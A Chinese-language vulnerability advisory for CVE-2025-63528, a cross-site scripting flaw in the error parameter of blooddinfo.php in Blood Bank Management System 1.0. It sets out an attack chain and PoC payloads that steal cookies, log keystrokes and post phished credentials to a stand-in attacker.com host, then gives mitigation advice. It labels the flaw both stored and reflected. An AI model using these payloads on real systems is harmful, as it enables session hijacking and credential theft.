CVE-2025-63528 Blood Bank Management System 1.0 XSS漏洞

漏洞信息

漏洞编号

CVE-2025-63528

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blood Bank Management System 1.0

漏洞概述

Blood Bank Management System 1.0是一款用于管理血液库的系统软件。在该系统的blooddinfo.php组件中存在一处存储型跨站脚本（Stored XSS）漏洞。漏洞产生的根本原因是应用程序在处理用户输入时未能对特殊字符进行充分的过滤和编码处理，导致攻击者可以通过特定参数注入恶意JavaScript代码。当其他用户访问包含恶意代码的页面时，注入的脚本会在受害者浏览器中执行，可能导致敏感信息泄露、会话劫持、钓鱼攻击等严重安全问题。鉴于该系统通常用于医疗机构，漏洞的存在可能对患者隐私和医疗数据安全造成更大威胁。CVSS评分8.5分，属于高危漏洞，攻击复杂度低，无需特殊权限即可实施攻击。

技术细节

漏洞位于Blood Bank Management System 1.0的blooddinfo.php文件中。该文件在处理用户请求时，直接将URL参数（如error参数）的值未经过滤就输出到HTML页面中。具体来说，当用户访问类似/blooddinfo.php?error=<script>alert(document.cookie)</script>的URL时，应用程序会将<script>alert(document.cookie)</script>作为普通文本输出到页面。由于浏览器会将<script>标签内的内容作为JavaScript代码执行，因此攻击者注入的恶意脚本将在访问该页面的用户浏览器中运行。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账号、进行钓鱼攻击或植入更多恶意内容。该漏洞属于反射型XSS与存储型XSS的结合利用，攻击者通常通过社会工程学手段诱导受害者访问特制的恶意链接。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统中存在的blooddinfo.php文件，并发现error参数存在XSS漏洞

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的URL，如包含<script>标签或事件处理器

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他渠道诱导目标用户访问恶意构造的URL

STEP 4

步骤4

受害者浏览器接收服务器响应，恶意脚本被嵌入页面并执行

STEP 5

步骤5

恶意脚本窃取受害者的Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 6

步骤6

攻击者利用窃取的凭证劫持用户会话，执行进一步恶意操作或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-63528 PoC - Blood Bank Management System 1.0 XSS -->
<!-- Target: blooddinfo.php error parameter -->

<!-- Basic XSS Test -->
https://target.com/blooddinfo.php?error=<script>alert('XSS')</script>

<!-- Cookie Stealing PoC -->
https://target.com/blooddinfo.php?error=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Session Hijacking PoC -->
https://target.com/blooddinfo.php?error=<img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie">

<!-- Keylogger PoC -->
https://target.com/blooddinfo.php?error=<script>document.onkeypress=function(e){fetch('https://attacker.com/k?k='+e.key)}</script>

<!-- HTML Injection + Phishing -->
https://target.com/blooddinfo.php?error=<div style='position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999'><h1>Session Expired - Please Login Again</h1><form action='https://attacker.com/phish'><input name='username'><input name='password' type='password'><button>Submit</button></form></div>

影响范围

Blood Bank Management System 1.0

防御指南

临时缓解措施

在正式修复方案实施前，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)层面配置规则，过滤包含<script>标签、javascript:协议及常用XSS特征的请求参数；2) 对blooddinfo.php文件实施紧急维护，添加输入过滤和输出编码逻辑；3) 临时禁用error参数功能或设置参数白名单；4) 加强对管理员和用户的安全意识培训，警惕可疑链接；5) 监控访问日志，排查是否存在异常的XSS探测或利用行为。建议尽快联系系统开发商获取官方补丁或考虑升级到已修复的版本。